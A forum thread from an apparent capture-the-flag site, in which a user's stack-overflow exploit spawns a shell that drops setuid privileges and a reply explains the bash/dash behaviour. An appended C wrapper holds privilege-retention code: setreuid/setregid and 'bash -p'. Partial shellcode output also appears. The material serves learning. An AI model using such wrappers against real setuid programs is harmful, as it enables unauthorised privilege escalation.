App - System

Sunday 23 June 2019, 11:15  #1
App - System ELF x86 - Stack buffer and integer overflow binary dropping privileges
rexstuff
  • 2 posts

Hello all

I’ve achieved code execution on ELF x86 - Stack buffer and integer overflow outside of GDB, but even though I am clearly running in a new shell, I am still running as the same user: I can’t access the .passwd file!

I’m not sure what’s going on here; I could just be doing it wrong, but I don’t see how, and I’m not sure as to the rules surrounding sharing payloads on the forum.

Here is a redacted version of what I am doing;

app-systeme-ch11@challenge02: $ python -c "print '...redacted...'" > /tmp/mfile
app-systeme-ch11@challenge02: $ ./ch11 /tmp/mfile
[+] The pathname is : /������������������������������������������������������������������������������������������1�j
XQh//shh/bin��̀BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB����

$ id
uid=1111(app-systeme-ch11) gid=1111(app-systeme-ch11) groups=1111(app-systeme-ch11),100(users)

If someone could take a look and let me know if everything is working right, I would appreciate it.

Friday 19 July 2019, 08:20  #2
App - System ELF x86 - Stack buffer and integer overflow binary dropping privileges
das
  • 57 posts

This is normal behaviour. bash has been dropping its privileges when the euid is not the real uid for 15 years now. dash (symlinked as /bin/sh on our boxes) received a patch in early 2018 and now does the same.

From the bash man page:

If the shell is started with the effective user (group) id not equal to the real user (group) id, and the -p option is not supplied, [...] the effective user id is set to the real user id. If the -p option is supplied at startup, the effective user id is not reset. Turning this option off causes the effective user and group ids to be set to the real user and group ids.

There are several ways around this:
* use a shellcode that sets the uid/gid you want
* use a shellcode that passes the '-p' option (check the manpage)
* use a legacy shellcode but point it to your wrapper /tmp/xx that does a setreuid() then system()
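The third workaround above, written out as an added example (this is not code from the forum posts or from the challenge): a small wrapper that you would compile to /tmp/xx and point the legacy execve shellcode at, instead of /bin/sh. It copies the effective uid/gid into the real ones so that the shell it starts sees ruid == euid and has nothing to drop; with a "-p" argument it instead leaves the ids alone and starts bash -p, which is the second workaround. The /tmp/xx path comes from the post; the "-p" argument handling and the helper names are my own choices.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

/* True when a child bash/dash (started without -p) would reset the
 * effective uid back to the real uid, i.e. when the two differ. */
int shell_would_drop(uid_t ruid, uid_t euid)
{
    return ruid != euid;
}

/* Make the real ids equal to the effective ids so the shell started
 * afterwards sees ruid == euid and keeps them.  Group first: once the
 * uid has been changed we may no longer be allowed to change the gid.
 * Returns 0 on success, -1 on failure (errno is set by the syscall). */
int keep_privs(void)
{
    uid_t euid = geteuid();
    gid_t egid = getegid();

    if (setregid(egid, egid) != 0)
        return -1;
    if (setreuid(euid, euid) != 0)
        return -1;
    return 0;
}

/* Wrapper entry point: build with  gcc -o /tmp/xx wrapper.c  and have the
 * shellcode execve("/tmp/xx") instead of execve("/bin/sh"). */
int main(int argc, char **argv)
{
    uid_t ruid = getuid(), euid = geteuid();

    fprintf(stderr, "[wrapper] before: uid=%u euid=%u would_drop=%d\n",
            (unsigned)ruid, (unsigned)euid, shell_would_drop(ruid, euid));

    if (argc > 1 && strcmp(argv[1], "-p") == 0) {
        /* Second workaround: keep the id mismatch and ask bash not to
         * reset it (see "-p" in the bash man page quoted above). */
        execl("/bin/bash", "bash", "-p", (char *)NULL);
        perror("execl /bin/bash -p");
        return 1;
    }

    /* Third workaround: setreuid()/setregid() first ... */
    if (keep_privs() != 0) {
        perror("setregid/setreuid");
        return 1;
    }
    fprintf(stderr, "[wrapper] after:  uid=%u euid=%u\n",
            (unsigned)getuid(), (unsigned)geteuid());

    /* ... then start the shell.  The post uses system("/bin/sh"); execl
     * does the same job without the intermediate "sh -c" process. */
    execl("/bin/sh", "sh", (char *)NULL);
    perror("execl /bin/sh");
    return 1;
}
```

When the wrapper is executed by the setuid ch11 process, geteuid() returns the owner of ch11, so keep_privs() makes that the real uid as well; the `id` in the resulting shell should then show the owner's uid rather than app-systeme-ch11. Run as a normal user (ruid == euid already) it is a no-op and simply gives you a shell, which is also why the check below passes unprivileged.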